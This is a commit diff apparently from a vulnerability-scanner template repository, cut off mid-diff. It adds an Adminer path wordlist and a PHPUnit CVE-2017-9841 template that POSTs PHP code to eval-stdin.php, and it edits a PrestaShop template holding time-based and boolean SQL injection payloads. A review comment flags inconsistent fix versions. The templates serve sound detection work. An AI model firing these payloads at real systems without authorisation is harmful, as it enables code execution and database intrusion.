Added new templates, fixed false positives, and enhanced others

- NEW: CVE-2022-31101 (PrestaShop vulnerability)
- NEW: CVE-2025-51586 (vulnerability detection)
- NEW: CVE-2017-9841 (PHPUnit RCE)
- NEW: adminer-paths wordlist (728 paths)

- FIXED FP: CVE-2022-22897 (enhanced detection)
- FIXED FP: CVE-2023-27032 (improved matchers)
- FIXED FP: CVE-2023-27847 (refined detection)
- FIXED FP: CVE-2023-30150 (better version matching)

- ENHANCED: PrestaShop admin panel detection
- ENHANCED: phpinfo files exposure detection

Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com>
This commit is contained in:
Prince Chaddha
2025-11-27 10:14:37 +04:00
parent 54910d34ca
commit b065f80c57
10 changed files with 1478 additions and 66 deletions


@@ -766,6 +766,734 @@
/adminer-4.8.1-sk.php
/adminer-4.8.1.php
/adminer-4.8.1/
/editor-4.8.2-cs.php
/editor-4.8.2-de.php
/editor-4.8.2-en.php
/editor-4.8.2-mysql-cs.php
/editor-4.8.2-mysql-de.php
/editor-4.8.2-mysql-en.php
/editor-4.8.2-mysql-pl.php
/editor-4.8.2-mysql-sk.php
/editor-4.8.2-mysql.php
/editor-4.8.2-pl.php
/editor-4.8.2-sk.php
/editor-4.8.2.php
/editor-4.8.2/
/adminer-4.8.2-cs.php
/adminer-4.8.2-de.php
/adminer-4.8.2-en.php
/adminer-4.8.2-mysql-cs.php
/adminer-4.8.2-mysql-de.php
/adminer-4.8.2-mysql-en.php
/adminer-4.8.2-mysql-pl.php
/adminer-4.8.2-mysql-sk.php
/adminer-4.8.2-mysql.php
/adminer-4.8.2-pl.php
/adminer-4.8.2-sk.php
/adminer-4.8.2.php
/adminer-4.8.2/
/editor-4.9.0-cs.php
/editor-4.9.0-de.php
/editor-4.9.0-en.php
/editor-4.9.0-mysql-cs.php
/editor-4.9.0-mysql-de.php
/editor-4.9.0-mysql-en.php
/editor-4.9.0-mysql-pl.php
/editor-4.9.0-mysql-sk.php
/editor-4.9.0-mysql.php
/editor-4.9.0-pl.php
/editor-4.9.0-sk.php
/editor-4.9.0.php
/editor-4.9.0/
/adminer-4.9.0-cs.php
/adminer-4.9.0-de.php
/adminer-4.9.0-en.php
/adminer-4.9.0-mysql-cs.php
/adminer-4.9.0-mysql-de.php
/adminer-4.9.0-mysql-en.php
/adminer-4.9.0-mysql-pl.php
/adminer-4.9.0-mysql-sk.php
/adminer-4.9.0-mysql.php
/adminer-4.9.0-pl.php
/adminer-4.9.0-sk.php
/adminer-4.9.0.php
/adminer-4.9.0/
/editor-4.9.1-cs.php
/editor-4.9.1-de.php
/editor-4.9.1-en.php
/editor-4.9.1-mysql-cs.php
/editor-4.9.1-mysql-de.php
/editor-4.9.1-mysql-en.php
/editor-4.9.1-mysql-pl.php
/editor-4.9.1-mysql-sk.php
/editor-4.9.1-mysql.php
/editor-4.9.1-pl.php
/editor-4.9.1-sk.php
/editor-4.9.1.php
/editor-4.9.1/
/adminer-4.9.1-cs.php
/adminer-4.9.1-de.php
/adminer-4.9.1-en.php
/adminer-4.9.1-mysql-cs.php
/adminer-4.9.1-mysql-de.php
/adminer-4.9.1-mysql-en.php
/adminer-4.9.1-mysql-pl.php
/adminer-4.9.1-mysql-sk.php
/adminer-4.9.1-mysql.php
/adminer-4.9.1-pl.php
/adminer-4.9.1-sk.php
/adminer-4.9.1.php
/adminer-4.9.1/
/editor-4.9.2-cs.php
/editor-4.9.2-de.php
/editor-4.9.2-en.php
/editor-4.9.2-mysql-cs.php
/editor-4.9.2-mysql-de.php
/editor-4.9.2-mysql-en.php
/editor-4.9.2-mysql-pl.php
/editor-4.9.2-mysql-sk.php
/editor-4.9.2-mysql.php
/editor-4.9.2-pl.php
/editor-4.9.2-sk.php
/editor-4.9.2.php
/editor-4.9.2/
/adminer-4.9.2-cs.php
/adminer-4.9.2-de.php
/adminer-4.9.2-en.php
/adminer-4.9.2-mysql-cs.php
/adminer-4.9.2-mysql-de.php
/adminer-4.9.2-mysql-en.php
/adminer-4.9.2-mysql-pl.php
/adminer-4.9.2-mysql-sk.php
/adminer-4.9.2-mysql.php
/adminer-4.9.2-pl.php
/adminer-4.9.2-sk.php
/adminer-4.9.2.php
/adminer-4.9.2/
/editor-4.9.3-cs.php
/editor-4.9.3-de.php
/editor-4.9.3-en.php
/editor-4.9.3-mysql-cs.php
/editor-4.9.3-mysql-de.php
/editor-4.9.3-mysql-en.php
/editor-4.9.3-mysql-pl.php
/editor-4.9.3-mysql-sk.php
/editor-4.9.3-mysql.php
/editor-4.9.3-pl.php
/editor-4.9.3-sk.php
/editor-4.9.3.php
/editor-4.9.3/
/adminer-4.9.3-cs.php
/adminer-4.9.3-de.php
/adminer-4.9.3-en.php
/adminer-4.9.3-mysql-cs.php
/adminer-4.9.3-mysql-de.php
/adminer-4.9.3-mysql-en.php
/adminer-4.9.3-mysql-pl.php
/adminer-4.9.3-mysql-sk.php
/adminer-4.9.3-mysql.php
/adminer-4.9.3-pl.php
/adminer-4.9.3-sk.php
/adminer-4.9.3.php
/adminer-4.9.3/
/editor-4.9.4-cs.php
/editor-4.9.4-de.php
/editor-4.9.4-en.php
/editor-4.9.4-mysql-cs.php
/editor-4.9.4-mysql-de.php
/editor-4.9.4-mysql-en.php
/editor-4.9.4-mysql-pl.php
/editor-4.9.4-mysql-sk.php
/editor-4.9.4-mysql.php
/editor-4.9.4-pl.php
/editor-4.9.4-sk.php
/editor-4.9.4.php
/editor-4.9.4/
/adminer-4.9.4-cs.php
/adminer-4.9.4-de.php
/adminer-4.9.4-en.php
/adminer-4.9.4-mysql-cs.php
/adminer-4.9.4-mysql-de.php
/adminer-4.9.4-mysql-en.php
/adminer-4.9.4-mysql-pl.php
/adminer-4.9.4-mysql-sk.php
/adminer-4.9.4-mysql.php
/adminer-4.9.4-pl.php
/adminer-4.9.4-sk.php
/adminer-4.9.4.php
/adminer-4.9.4/
/editor-4.10.0-cs.php
/editor-4.10.0-de.php
/editor-4.10.0-en.php
/editor-4.10.0-mysql-cs.php
/editor-4.10.0-mysql-de.php
/editor-4.10.0-mysql-en.php
/editor-4.10.0-mysql-pl.php
/editor-4.10.0-mysql-sk.php
/editor-4.10.0-mysql.php
/editor-4.10.0-pl.php
/editor-4.10.0-sk.php
/editor-4.10.0.php
/editor-4.10.0/
/adminer-4.10.0-cs.php
/adminer-4.10.0-de.php
/adminer-4.10.0-en.php
/adminer-4.10.0-mysql-cs.php
/adminer-4.10.0-mysql-de.php
/adminer-4.10.0-mysql-en.php
/adminer-4.10.0-mysql-pl.php
/adminer-4.10.0-mysql-sk.php
/adminer-4.10.0-mysql.php
/adminer-4.10.0-pl.php
/adminer-4.10.0-sk.php
/adminer-4.10.0.php
/adminer-4.10.0/
/editor-4.11.0-cs.php
/editor-4.11.0-de.php
/editor-4.11.0-en.php
/editor-4.11.0-mysql-cs.php
/editor-4.11.0-mysql-de.php
/editor-4.11.0-mysql-en.php
/editor-4.11.0-mysql-pl.php
/editor-4.11.0-mysql-sk.php
/editor-4.11.0-mysql.php
/editor-4.11.0-pl.php
/editor-4.11.0-sk.php
/editor-4.11.0.php
/editor-4.11.0/
/adminer-4.11.0-cs.php
/adminer-4.11.0-de.php
/adminer-4.11.0-en.php
/adminer-4.11.0-mysql-cs.php
/adminer-4.11.0-mysql-de.php
/adminer-4.11.0-mysql-en.php
/adminer-4.11.0-mysql-pl.php
/adminer-4.11.0-mysql-sk.php
/adminer-4.11.0-mysql.php
/adminer-4.11.0-pl.php
/adminer-4.11.0-sk.php
/adminer-4.11.0.php
/adminer-4.11.0/
/editor-4.12.0-cs.php
/editor-4.12.0-de.php
/editor-4.12.0-en.php
/editor-4.12.0-mysql-cs.php
/editor-4.12.0-mysql-de.php
/editor-4.12.0-mysql-en.php
/editor-4.12.0-mysql-pl.php
/editor-4.12.0-mysql-sk.php
/editor-4.12.0-mysql.php
/editor-4.12.0-pl.php
/editor-4.12.0-sk.php
/editor-4.12.0.php
/editor-4.12.0/
/adminer-4.12.0-cs.php
/adminer-4.12.0-de.php
/adminer-4.12.0-en.php
/adminer-4.12.0-mysql-cs.php
/adminer-4.12.0-mysql-de.php
/adminer-4.12.0-mysql-en.php
/adminer-4.12.0-mysql-pl.php
/adminer-4.12.0-mysql-sk.php
/adminer-4.12.0-mysql.php
/adminer-4.12.0-pl.php
/adminer-4.12.0-sk.php
/adminer-4.12.0.php
/adminer-4.12.0/
/editor-4.14.0-cs.php
/editor-4.14.0-de.php
/editor-4.14.0-en.php
/editor-4.14.0-mysql-cs.php
/editor-4.14.0-mysql-de.php
/editor-4.14.0-mysql-en.php
/editor-4.14.0-mysql-pl.php
/editor-4.14.0-mysql-sk.php
/editor-4.14.0-mysql.php
/editor-4.14.0-pl.php
/editor-4.14.0-sk.php
/editor-4.14.0.php
/editor-4.14.0/
/adminer-4.14.0-cs.php
/adminer-4.14.0-de.php
/adminer-4.14.0-en.php
/adminer-4.14.0-mysql-cs.php
/adminer-4.14.0-mysql-de.php
/adminer-4.14.0-mysql-en.php
/adminer-4.14.0-mysql-pl.php
/adminer-4.14.0-mysql-sk.php
/adminer-4.14.0-mysql.php
/adminer-4.14.0-pl.php
/adminer-4.14.0-sk.php
/adminer-4.14.0.php
/adminer-4.14.0/
/editor-4.15.0-cs.php
/editor-4.15.0-de.php
/editor-4.15.0-en.php
/editor-4.15.0-mysql-cs.php
/editor-4.15.0-mysql-de.php
/editor-4.15.0-mysql-en.php
/editor-4.15.0-mysql-pl.php
/editor-4.15.0-mysql-sk.php
/editor-4.15.0-mysql.php
/editor-4.15.0-pl.php
/editor-4.15.0-sk.php
/editor-4.15.0.php
/editor-4.15.0/
/adminer-4.15.0-cs.php
/adminer-4.15.0-de.php
/adminer-4.15.0-en.php
/adminer-4.15.0-mysql-cs.php
/adminer-4.15.0-mysql-de.php
/adminer-4.15.0-mysql-en.php
/adminer-4.15.0-mysql-pl.php
/adminer-4.15.0-mysql-sk.php
/adminer-4.15.0-mysql.php
/adminer-4.15.0-pl.php
/adminer-4.15.0-sk.php
/adminer-4.15.0.php
/adminer-4.15.0/
/editor-4.16.0-cs.php
/editor-4.16.0-de.php
/editor-4.16.0-en.php
/editor-4.16.0-mysql-cs.php
/editor-4.16.0-mysql-de.php
/editor-4.16.0-mysql-en.php
/editor-4.16.0-mysql-pl.php
/editor-4.16.0-mysql-sk.php
/editor-4.16.0-mysql.php
/editor-4.16.0-pl.php
/editor-4.16.0-sk.php
/editor-4.16.0.php
/editor-4.16.0/
/adminer-4.16.0-cs.php
/adminer-4.16.0-de.php
/adminer-4.16.0-en.php
/adminer-4.16.0-mysql-cs.php
/adminer-4.16.0-mysql-de.php
/adminer-4.16.0-mysql-en.php
/adminer-4.16.0-mysql-pl.php
/adminer-4.16.0-mysql-sk.php
/adminer-4.16.0-mysql.php
/adminer-4.16.0-pl.php
/adminer-4.16.0-sk.php
/adminer-4.16.0.php
/adminer-4.16.0/
/editor-4.17.0-cs.php
/editor-4.17.0-de.php
/editor-4.17.0-en.php
/editor-4.17.0-mysql-cs.php
/editor-4.17.0-mysql-de.php
/editor-4.17.0-mysql-en.php
/editor-4.17.0-mysql-pl.php
/editor-4.17.0-mysql-sk.php
/editor-4.17.0-mysql.php
/editor-4.17.0-pl.php
/editor-4.17.0-sk.php
/editor-4.17.0.php
/editor-4.17.0/
/adminer-4.17.0-cs.php
/adminer-4.17.0-de.php
/adminer-4.17.0-en.php
/adminer-4.17.0-mysql-cs.php
/adminer-4.17.0-mysql-de.php
/adminer-4.17.0-mysql-en.php
/adminer-4.17.0-mysql-pl.php
/adminer-4.17.0-mysql-sk.php
/adminer-4.17.0-mysql.php
/adminer-4.17.0-pl.php
/adminer-4.17.0-sk.php
/adminer-4.17.0.php
/adminer-4.17.0/
/editor-4.17.1-cs.php
/editor-4.17.1-de.php
/editor-4.17.1-en.php
/editor-4.17.1-mysql-cs.php
/editor-4.17.1-mysql-de.php
/editor-4.17.1-mysql-en.php
/editor-4.17.1-mysql-pl.php
/editor-4.17.1-mysql-sk.php
/editor-4.17.1-mysql.php
/editor-4.17.1-pl.php
/editor-4.17.1-sk.php
/editor-4.17.1.php
/editor-4.17.1/
/adminer-4.17.1-cs.php
/adminer-4.17.1-de.php
/adminer-4.17.1-en.php
/adminer-4.17.1-mysql-cs.php
/adminer-4.17.1-mysql-de.php
/adminer-4.17.1-mysql-en.php
/adminer-4.17.1-mysql-pl.php
/adminer-4.17.1-mysql-sk.php
/adminer-4.17.1-mysql.php
/adminer-4.17.1-pl.php
/adminer-4.17.1-sk.php
/adminer-4.17.1.php
/adminer-4.17.1/
/editor-5.0.0-cs.php
/editor-5.0.0-de.php
/editor-5.0.0-en.php
/editor-5.0.0-mysql-cs.php
/editor-5.0.0-mysql-de.php
/editor-5.0.0-mysql-en.php
/editor-5.0.0-mysql-pl.php
/editor-5.0.0-mysql-sk.php
/editor-5.0.0-mysql.php
/editor-5.0.0-pl.php
/editor-5.0.0-sk.php
/editor-5.0.0.php
/editor-5.0.0/
/adminer-5.0.0-cs.php
/adminer-5.0.0-de.php
/adminer-5.0.0-en.php
/adminer-5.0.0-mysql-cs.php
/adminer-5.0.0-mysql-de.php
/adminer-5.0.0-mysql-en.php
/adminer-5.0.0-mysql-pl.php
/adminer-5.0.0-mysql-sk.php
/adminer-5.0.0-mysql.php
/adminer-5.0.0-pl.php
/adminer-5.0.0-sk.php
/adminer-5.0.0.php
/adminer-5.0.0/
/editor-5.0.1-cs.php
/editor-5.0.1-de.php
/editor-5.0.1-en.php
/editor-5.0.1-mysql-cs.php
/editor-5.0.1-mysql-de.php
/editor-5.0.1-mysql-en.php
/editor-5.0.1-mysql-pl.php
/editor-5.0.1-mysql-sk.php
/editor-5.0.1-mysql.php
/editor-5.0.1-pl.php
/editor-5.0.1-sk.php
/editor-5.0.1.php
/editor-5.0.1/
/adminer-5.0.1-cs.php
/adminer-5.0.1-de.php
/adminer-5.0.1-en.php
/adminer-5.0.1-mysql-cs.php
/adminer-5.0.1-mysql-de.php
/adminer-5.0.1-mysql-en.php
/adminer-5.0.1-mysql-pl.php
/adminer-5.0.1-mysql-sk.php
/adminer-5.0.1-mysql.php
/adminer-5.0.1-pl.php
/adminer-5.0.1-sk.php
/adminer-5.0.1.php
/adminer-5.0.1/
/editor-5.0.2-cs.php
/editor-5.0.2-de.php
/editor-5.0.2-en.php
/editor-5.0.2-mysql-cs.php
/editor-5.0.2-mysql-de.php
/editor-5.0.2-mysql-en.php
/editor-5.0.2-mysql-pl.php
/editor-5.0.2-mysql-sk.php
/editor-5.0.2-mysql.php
/editor-5.0.2-pl.php
/editor-5.0.2-sk.php
/editor-5.0.2.php
/editor-5.0.2/
/adminer-5.0.2-cs.php
/adminer-5.0.2-de.php
/adminer-5.0.2-en.php
/adminer-5.0.2-mysql-cs.php
/adminer-5.0.2-mysql-de.php
/adminer-5.0.2-mysql-en.php
/adminer-5.0.2-mysql-pl.php
/adminer-5.0.2-mysql-sk.php
/adminer-5.0.2-mysql.php
/adminer-5.0.2-pl.php
/adminer-5.0.2-sk.php
/adminer-5.0.2.php
/adminer-5.0.2/
/editor-5.0.3-cs.php
/editor-5.0.3-de.php
/editor-5.0.3-en.php
/editor-5.0.3-mysql-cs.php
/editor-5.0.3-mysql-de.php
/editor-5.0.3-mysql-en.php
/editor-5.0.3-mysql-pl.php
/editor-5.0.3-mysql-sk.php
/editor-5.0.3-mysql.php
/editor-5.0.3-pl.php
/editor-5.0.3-sk.php
/editor-5.0.3.php
/editor-5.0.3/
/adminer-5.0.3-cs.php
/adminer-5.0.3-de.php
/adminer-5.0.3-en.php
/adminer-5.0.3-mysql-cs.php
/adminer-5.0.3-mysql-de.php
/adminer-5.0.3-mysql-en.php
/adminer-5.0.3-mysql-pl.php
/adminer-5.0.3-mysql-sk.php
/adminer-5.0.3-mysql.php
/adminer-5.0.3-pl.php
/adminer-5.0.3-sk.php
/adminer-5.0.3.php
/adminer-5.0.3/
/editor-5.0.4-cs.php
/editor-5.0.4-de.php
/editor-5.0.4-en.php
/editor-5.0.4-mysql-cs.php
/editor-5.0.4-mysql-de.php
/editor-5.0.4-mysql-en.php
/editor-5.0.4-mysql-pl.php
/editor-5.0.4-mysql-sk.php
/editor-5.0.4-mysql.php
/editor-5.0.4-pl.php
/editor-5.0.4-sk.php
/editor-5.0.4.php
/editor-5.0.4/
/adminer-5.0.4-cs.php
/adminer-5.0.4-de.php
/adminer-5.0.4-en.php
/adminer-5.0.4-mysql-cs.php
/adminer-5.0.4-mysql-de.php
/adminer-5.0.4-mysql-en.php
/adminer-5.0.4-mysql-pl.php
/adminer-5.0.4-mysql-sk.php
/adminer-5.0.4-mysql.php
/adminer-5.0.4-pl.php
/adminer-5.0.4-sk.php
/adminer-5.0.4.php
/adminer-5.0.4/
/editor-5.0.5-cs.php
/editor-5.0.5-de.php
/editor-5.0.5-en.php
/editor-5.0.5-mysql-cs.php
/editor-5.0.5-mysql-de.php
/editor-5.0.5-mysql-en.php
/editor-5.0.5-mysql-pl.php
/editor-5.0.5-mysql-sk.php
/editor-5.0.5-mysql.php
/editor-5.0.5-pl.php
/editor-5.0.5-sk.php
/editor-5.0.5.php
/editor-5.0.5/
/adminer-5.0.5-cs.php
/adminer-5.0.5-de.php
/adminer-5.0.5-en.php
/adminer-5.0.5-mysql-cs.php
/adminer-5.0.5-mysql-de.php
/adminer-5.0.5-mysql-en.php
/adminer-5.0.5-mysql-pl.php
/adminer-5.0.5-mysql-sk.php
/adminer-5.0.5-mysql.php
/adminer-5.0.5-pl.php
/adminer-5.0.5-sk.php
/adminer-5.0.5.php
/adminer-5.0.5/
/editor-5.0.6-cs.php
/editor-5.0.6-de.php
/editor-5.0.6-en.php
/editor-5.0.6-mysql-cs.php
/editor-5.0.6-mysql-de.php
/editor-5.0.6-mysql-en.php
/editor-5.0.6-mysql-pl.php
/editor-5.0.6-mysql-sk.php
/editor-5.0.6-mysql.php
/editor-5.0.6-pl.php
/editor-5.0.6-sk.php
/editor-5.0.6.php
/editor-5.0.6/
/adminer-5.0.6-cs.php
/adminer-5.0.6-de.php
/adminer-5.0.6-en.php
/adminer-5.0.6-mysql-cs.php
/adminer-5.0.6-mysql-de.php
/adminer-5.0.6-mysql-en.php
/adminer-5.0.6-mysql-pl.php
/adminer-5.0.6-mysql-sk.php
/adminer-5.0.6-mysql.php
/adminer-5.0.6-pl.php
/adminer-5.0.6-sk.php
/adminer-5.0.6.php
/adminer-5.0.6/
/editor-5.1.0-cs.php
/editor-5.1.0-de.php
/editor-5.1.0-en.php
/editor-5.1.0-mysql-cs.php
/editor-5.1.0-mysql-de.php
/editor-5.1.0-mysql-en.php
/editor-5.1.0-mysql-pl.php
/editor-5.1.0-mysql-sk.php
/editor-5.1.0-mysql.php
/editor-5.1.0-pl.php
/editor-5.1.0-sk.php
/editor-5.1.0.php
/editor-5.1.0/
/adminer-5.1.0-cs.php
/adminer-5.1.0-de.php
/adminer-5.1.0-en.php
/adminer-5.1.0-mysql-cs.php
/adminer-5.1.0-mysql-de.php
/adminer-5.1.0-mysql-en.php
/adminer-5.1.0-mysql-pl.php
/adminer-5.1.0-mysql-sk.php
/adminer-5.1.0-mysql.php
/adminer-5.1.0-pl.php
/adminer-5.1.0-sk.php
/adminer-5.1.0.php
/adminer-5.1.0/
/editor-5.1.1-cs.php
/editor-5.1.1-de.php
/editor-5.1.1-en.php
/editor-5.1.1-mysql-cs.php
/editor-5.1.1-mysql-de.php
/editor-5.1.1-mysql-en.php
/editor-5.1.1-mysql-pl.php
/editor-5.1.1-mysql-sk.php
/editor-5.1.1-mysql.php
/editor-5.1.1-pl.php
/editor-5.1.1-sk.php
/editor-5.1.1.php
/editor-5.1.1/
/adminer-5.1.1-cs.php
/adminer-5.1.1-de.php
/adminer-5.1.1-en.php
/adminer-5.1.1-mysql-cs.php
/adminer-5.1.1-mysql-de.php
/adminer-5.1.1-mysql-en.php
/adminer-5.1.1-mysql-pl.php
/adminer-5.1.1-mysql-sk.php
/adminer-5.1.1-mysql.php
/adminer-5.1.1-pl.php
/adminer-5.1.1-sk.php
/adminer-5.1.1.php
/adminer-5.1.1/
/editor-5.2.0-cs.php
/editor-5.2.0-de.php
/editor-5.2.0-en.php
/editor-5.2.0-mysql-cs.php
/editor-5.2.0-mysql-de.php
/editor-5.2.0-mysql-en.php
/editor-5.2.0-mysql-pl.php
/editor-5.2.0-mysql-sk.php
/editor-5.2.0-mysql.php
/editor-5.2.0-pl.php
/editor-5.2.0-sk.php
/editor-5.2.0.php
/editor-5.2.0/
/adminer-5.2.0-cs.php
/adminer-5.2.0-de.php
/adminer-5.2.0-en.php
/adminer-5.2.0-mysql-cs.php
/adminer-5.2.0-mysql-de.php
/adminer-5.2.0-mysql-en.php
/adminer-5.2.0-mysql-pl.php
/adminer-5.2.0-mysql-sk.php
/adminer-5.2.0-mysql.php
/adminer-5.2.0-pl.php
/adminer-5.2.0-sk.php
/adminer-5.2.0.php
/adminer-5.2.0/
/editor-5.2.1-cs.php
/editor-5.2.1-de.php
/editor-5.2.1-en.php
/editor-5.2.1-mysql-cs.php
/editor-5.2.1-mysql-de.php
/editor-5.2.1-mysql-en.php
/editor-5.2.1-mysql-pl.php
/editor-5.2.1-mysql-sk.php
/editor-5.2.1-mysql.php
/editor-5.2.1-pl.php
/editor-5.2.1-sk.php
/editor-5.2.1.php
/editor-5.2.1/
/adminer-5.2.1-cs.php
/adminer-5.2.1-de.php
/adminer-5.2.1-en.php
/adminer-5.2.1-mysql-cs.php
/adminer-5.2.1-mysql-de.php
/adminer-5.2.1-mysql-en.php
/adminer-5.2.1-mysql-pl.php
/adminer-5.2.1-mysql-sk.php
/adminer-5.2.1-mysql.php
/adminer-5.2.1-pl.php
/adminer-5.2.1-sk.php
/adminer-5.2.1.php
/adminer-5.2.1/
/editor-5.3.0-cs.php
/editor-5.3.0-de.php
/editor-5.3.0-en.php
/editor-5.3.0-mysql-cs.php
/editor-5.3.0-mysql-de.php
/editor-5.3.0-mysql-en.php
/editor-5.3.0-mysql-pl.php
/editor-5.3.0-mysql-sk.php
/editor-5.3.0-mysql.php
/editor-5.3.0-pl.php
/editor-5.3.0-sk.php
/editor-5.3.0.php
/editor-5.3.0/
/adminer-5.3.0-cs.php
/adminer-5.3.0-de.php
/adminer-5.3.0-en.php
/adminer-5.3.0-mysql-cs.php
/adminer-5.3.0-mysql-de.php
/adminer-5.3.0-mysql-en.php
/adminer-5.3.0-mysql-pl.php
/adminer-5.3.0-mysql-sk.php
/adminer-5.3.0-mysql.php
/adminer-5.3.0-pl.php
/adminer-5.3.0-sk.php
/adminer-5.3.0.php
/adminer-5.3.0/
/editor-5.4.0-cs.php
/editor-5.4.0-de.php
/editor-5.4.0-en.php
/editor-5.4.0-mysql-cs.php
/editor-5.4.0-mysql-de.php
/editor-5.4.0-mysql-en.php
/editor-5.4.0-mysql-pl.php
/editor-5.4.0-mysql-sk.php
/editor-5.4.0-mysql.php
/editor-5.4.0-pl.php
/editor-5.4.0-sk.php
/editor-5.4.0.php
/editor-5.4.0/
/adminer-5.4.0-cs.php
/adminer-5.4.0-de.php
/adminer-5.4.0-en.php
/adminer-5.4.0-mysql-cs.php
/adminer-5.4.0-mysql-de.php
/adminer-5.4.0-mysql-en.php
/adminer-5.4.0-mysql-pl.php
/adminer-5.4.0-mysql-sk.php
/adminer-5.4.0-mysql.php
/adminer-5.4.0-pl.php
/adminer-5.4.0-sk.php
/adminer-5.4.0.php
/adminer-5.4.0/
/editor-5.4.1-cs.php
/editor-5.4.1-de.php
/editor-5.4.1-en.php
/editor-5.4.1-mysql-cs.php
/editor-5.4.1-mysql-de.php
/editor-5.4.1-mysql-en.php
/editor-5.4.1-mysql-pl.php
/editor-5.4.1-mysql-sk.php
/editor-5.4.1-mysql.php
/editor-5.4.1-pl.php
/editor-5.4.1-sk.php
/editor-5.4.1.php
/editor-5.4.1/
/adminer-5.4.1-cs.php
/adminer-5.4.1-de.php
/adminer-5.4.1-en.php
/adminer-5.4.1-mysql-cs.php
/adminer-5.4.1-mysql-de.php
/adminer-5.4.1-mysql-en.php
/adminer-5.4.1-mysql-pl.php
/adminer-5.4.1-mysql-sk.php
/adminer-5.4.1-mysql.php
/adminer-5.4.1-pl.php
/adminer-5.4.1-sk.php
/adminer-5.4.1.php
/adminer-5.4.1/
/itlabvietadminer.php
/vendor/phpunit/phpunit/src/Util/PHP/adminer-4.7.7.php
/vendor/phpunit/phpunit/src/Util/PHP/adminer.php


@@ -0,0 +1,82 @@
id: CVE-2017-9841
info:
name: PHPUnit - Remote Code Execution
author: Random_Robbie,pikpikcu
severity: critical
description: PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring via Util/PHP/eval-stdin.php , as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.
remediation: |
Upgrade to PHPUnit version 5.7.21 or 6.1.6 or later.
reference:
- https://github.com/cyberharsh/Php-unit-CVE-2017-9841
- https://github.com/RandomRobbieBF/phpunit-brute
- https://thephp.cc/articles/phpunit-a-security-risk
- https://twitter.com/sec715/status/1411517028012158976
- https://nvd.nist.gov/vuln/detail/CVE-2017-9841
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-9841
cwe-id: CWE-94
epss-score: 0.94351
epss-percentile: 0.99953
cpe: cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:*:*:*:*
metadata:
max-request: 6
vendor: phpunit_project
product: phpunit
tags: cve2017,cve,php,phpunit,rce,kev,phpunit_project,vkev,vuln
variables:
string: "CVE-2017-9841"
http:
- raw:
- |
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
<?php echo md5("{{string}}");?>
- |
GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
<?php echo md5("{{string}}");?>
- |
GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
<?php echo md5("{{string}}");?>
- |
GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
<?php echo md5("{{string}}");?>
- |
GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
<?php echo md5("{{string}}");?>
- |
GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
<?php echo md5("{{string}}");?>
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(string)}}'
- type: status
status:
- 200
# digest: 4b0a00483046022100aed42b83f4f1534b3058586eeaadd4586c31200fdd40a0de62aaaca9e9536089022100b109b1c910eb82dc220f4dc7b7bdd15df89dc2fe4a0af996404147c9c2bf9a14:922c64590222798bb761d5b6d8e72950
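Review bot: The fixed versions stated in `description` (before 4.8.28 and 5.x before 5.6.3) and in `remediation` (5.7.21 or 6.1.6 or later) do not agree, so a reader of the template cannot tell which release actually closes the issue. Reconcile the two, or have the remediation say why it recommends releases later than the ones named in the description. The description also names the root cause as a web-reachable `/vendor` directory, yet the remediation only mentions upgrading; a line such as `Upgrade PHPUnit to a fixed release and ensure the /vendor directory is not served by the web server.` would cover both the package and the deployment defect that every request in this template depends on.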


@@ -19,18 +19,16 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-22897
cwe-id: CWE-89
epss-score: 0.85193
epss-percentile: 0.99308
epss-score: 0.86131
epss-percentile: 0.99358
cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:*
metadata:
verified: true
max-request: 4
vendor: apollotheme
product: "ap_pagebuilder"
product: ap_pagebuilder
framework: prestashop
shodan-query:
- "http.component:\"Prestashop\""
- http.component:"prestashop"
shodan-query: http.component:"prestashop"
tags: time-based-sqli,cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme,vkev,vuln
http:
@@ -38,6 +36,7 @@ http:
- |
GET /modules/appagebuilder/config.xml HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 20s
POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
@@ -47,8 +46,8 @@ http:
X-Requested-With: XMLHttpRequest
leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)
- |
@timeout: 20s
POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
@@ -56,8 +55,8 @@ http:
X-Requested-With: XMLHttpRequest
leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6644=6644-- yMwI
- |
@timeout: 20s
POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
@@ -66,8 +65,25 @@ http:
leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI
host-redirects: true
max-redirects: 3
- |
@timeout: 20s
POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}
X-Requested-With: XMLHttpRequest
leoajax=1&pro_add=if(now()=sysdate()%2Csleep(6)%2C0)
- |
